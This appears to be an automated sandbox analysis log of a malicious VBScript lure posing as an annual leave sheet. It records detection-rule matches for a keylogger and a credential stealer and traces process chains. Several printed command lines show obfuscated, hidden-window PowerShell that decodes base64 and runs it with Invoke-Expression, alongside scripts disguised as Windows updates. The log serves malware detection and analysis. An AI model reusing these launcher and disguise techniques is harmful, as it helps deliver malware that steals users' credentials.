Source: 22.2.powershell.exe.5ce0820.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 79.2.powershell.exe.5a119c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000003B.00000002.3066006741.00000000060F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000004F.00000002.3322494498.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000003B.00000002.3191009735.000000000A6E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000003B.00000002.3066006741.00000000060A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000004F.00000002.3322494498.0000000005A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000004F.00000002.3451596999.000000000A135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4696, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 22.2.powershell.exe.a16893c.11.raw.unpack, tjjjj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.a6c382c.7.raw.unpack, tjjjj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.96e0000.3.raw.unpack, tjjjj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.a15e2d4.12.raw.unpack, tjjjj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.a6a0b58.8.raw.unpack, tjjjj.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: DeviceCredentialDeployment.exe, 00000005.00000002.2152293310.000001F244F19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@104/89@5/6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nova_kaycee[1].vbsJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8000
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7892
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
                  Source: C:\Windows\System32\DeviceCredentialDeployment.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7628
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4696
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7564
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7044
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3792:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_it50rxs1.rwm.ps1Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Annual Leave sheet 2025.vbsVirustotal: Detection: 8%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'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'+[cHAr]0X22+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\DeviceCredentialDeployment.exe "C:\Windows\system32\DeviceCredentialDeployment.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES509F.tmp" "c:\Users\user\AppData\Local\Temp\CSC8F7BB283C99B46799FCDCA9D84A75A0.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_706.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_706.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 3380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8000 -s 3228
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_394.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_801.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 3244
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_394.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7892 -s 3388
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_801.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 3388
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_87.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 3336
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_87.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_412.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_412.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
